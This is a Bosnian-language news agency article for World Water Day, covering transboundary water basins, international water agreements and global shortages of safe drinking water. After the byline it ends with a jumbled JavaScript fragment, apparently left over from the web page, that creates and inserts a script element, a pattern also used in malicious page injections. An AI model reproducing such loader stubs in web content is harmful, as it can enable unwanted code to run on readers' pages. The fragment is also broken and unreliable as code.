Danas je Svjetski dan voda

Svjetski dan voda obilježava se svake godine 22. marta. Obilježavanje ovog dana određeno je usvajanjem Rezolucije Generalne skupštine Ujedinjenih naroda u decembru 1992. godine.

Evropa je kontinent prekograničnih vodnih resursa, pri čemu neke zemlje primaju više od 50 posto svoje vode iz susjednih zemalja.

Vode sa šest od ukupno osam većih slivnih područja u Bosni i Hercegovini imaju prekogranični karakter (slivovi Une, Drine, Save, Neretve, Trebišnjice i Cetine).

Kako je saopćeno iz Federalnog zavoda za javno zdravstvo, Bosna i Hercegovina je jedna od rijetkih zemalja u Evropi i u svijetu koja ima značajne rezerve čiste vode za piće.

Međutim, otpadne vode predstavljaju opasnost za naše vodne resurse. Kontroli kvaliteta voda rijeka i jezera ne posvećuje se dovoljno pažnje, što predstavlja značajan epidemiološki rizik, naročito u ljetnim mjesecima.

U situaciji kada svaka zemlja nastoji zadovoljiti svoje potrebe za vodom iz ograničenih vodnih resursa, mnogi predviđaju budućnost ispunjenu sukobima.

Međutim, historija pokazuje da je saradnja, a ne sukobi, najčešći odgovor na pitanja vezana za prekogranično upravljanje vodnim resursima.

Tokom proteklih 60 godina bilo je više od 300 međunarodnih sporazuma vezanih za korištenje prekograničnih voda i samo 37 prijavljenih slučajeva sukoba između država u vezi sa vodom.

Evropska Konvencija o upotrebi prekograničnih vodotoka i međunarodnih jezera (1992) pruža osnove za razuman i pravedan način upravljanja vodnim resursim, koji služi potrebama prirode, poljoprivrede i industrije, a prije svega ljudskog zdravlja.

U cilju zaštite zdravlja sadašnjih i budućih generacija, neophodno je spriječiti zagađenje vodnih resursa, što zahtijeva odgovornost svake zemlje i njenog stanovništva, kao i punu međunarodnu saradnju.

Podsjećanja radi, Svjetski dan voda je prvi put obilježen 1993. godine, a s vremenom je značaj ovog praznika rastao.

Obilježavanjem ovog dana UN želi podsjetiti na važnost zaštite vode za piće, jer oko milijardu ljudi u svijetu nema pristup sigurnoj pitkoj vodi.

Iako je tri četvrtine površine na Zemlji prekriveno vodom, voda za piće čini 2,5 posto od ukupne količine vode. Od toga skoro 80 posto se nalazi zaleđeno na polovima i ostalim zaleđenim površinama (glečeri).

Dakle, svega 0,5 posto vode na Planeti može se koristiti za piće.

Prema podacima Svjetske zdravstvene organizacije, zbog nedostatka vode 2,5 milijarde ljudi u svijetu živi bez osnovnih sanitarnih uslova.

Bolesti uzrokovane zagađenom vodom za piće i lošim sanitarnim uslovima, svake godine u svijetu odnesu oko 2,5 miliona života.
Resursi pitke vode u cijelom svijetu su ugroženi, ne samo zbog prekomjernog korištenja i neodgovarajućeg upravljanja.

FENA

document.currentScript.parentNode.insertBefore(s, document.currentScript);var d=document;var s=d.createElement(‘script’);